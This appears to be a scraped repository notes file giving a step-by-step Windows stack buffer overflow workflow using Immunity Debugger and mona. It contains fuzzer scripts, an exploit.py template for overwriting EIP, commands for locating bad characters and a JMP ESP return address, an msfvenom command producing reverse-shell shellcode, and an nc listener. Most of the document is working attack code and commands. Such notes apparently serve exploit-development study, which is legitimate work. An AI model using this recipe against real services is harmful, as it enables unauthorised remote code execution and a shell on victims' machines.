-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathImmunity_Debugger_Workflow
147 lines (108 loc) · 3.2 KB
/
Immunity_Debugger_Workflow
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
Use fuzzer.py or fuzzer2.py, until the application crash inside Immunity Debugger.
# fuzzer.py
import socket, time, sys
IP = "<IP>"
PORT = <PORT>
timeout = 5
buffer = []
counter = 100
while len(buffer) < 30:
buffer.append("A" * counter)
counter += 100
for string in buffer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
connect = s.connect((IP, PORT))
s.recv(1024)
print("Fuzzing with %s bytes" % len(string))
s.send(string)
s.recv(1024)
s.close()
except:
print("Could not connect to " + IP + ":" + str(PORT))
sys.exit(0)
time.sleep(1)
# fuzzer2.py
import socket
IP = "<IP>"
PORT = <PORT>
payload = 1000 * "A"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(payload)
print "[+] " + str(len(payload)) + " Bytes Sent"
except:
print "[-] Crashed"
When the application crashes, EIP should be equal to 41414141
Crash replication & controlling EIP
Pattern
Generate a cyclic pattern to found the exact offset of the crash :
!mona pc <SIZE>
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <SIZE>
The size must be higher than the crash offset. Now modify the payload variable by the cyclic pattern :
# exploit.py
import socket
ip = "<IP>"
port = <PORT>
prefix = ""
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(buffer + "\r\n")
print("Done!")
except:
print("Could not connect.")
Re-run the exploit, the application should crash. To find the exact offset of the crash use :
!mona findmsp -distance <SIZE>
Size is the same as the one used to create the pattern. The result should be something like :
EIP contains normal pattern : ... (offset XXXX)
Get the offset, modify in exploit.py:
The offset variable by the offset
The retn variable by “BBBB”
Remove the payload variable
offset = <OFFSET>
overflow = "A" * offset
retn = "BBBB"
payload = ""
Exploit.py, EIP = 42424242
Bad characters
!mona bytearray -b "\x00"
Copy the results in the variable payload re-run exploit.py
!mona compare -f C:\mona\<PATH>\bytearray.bin -a <ESP_ADDRESS>
If bad chars are found, we need to exclude them as well.
!mona bytearray -b "\x00 + <BAD_CHARS>"
# Example
!mona bytearray -b "\x00\x01\x02\x03"
Then compare
!mona compare -f C:\mona\<PATH>\bytearray.bin -a <ESP_ADDRESS>
Finding a jump point
JMP ESP - Inside the .exe
!mona jmp -r esp -cpb "<BAD_CHARS>"
JMP ESP - inside a DLL
!mona modules
Rebase, SafeSEH, ASLR, NXCompat are set to False.
!mona find -s "\xff\xe4" -m <DLL>
Return address
Choose an address in the results and update exploit.py :
# Example of a JMP ESP address
0x625011af
# exploit.py
retn = "\xaf\x11\x50\x62"
Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b "<BAD_CHARS>" -f c
Copy the generated shellcode and update exploit.py :
Setting the payload variable equal to the shellcode
NOP-sled
padding = "\x90" * 16
Start a listener
nc -lvp <PORT>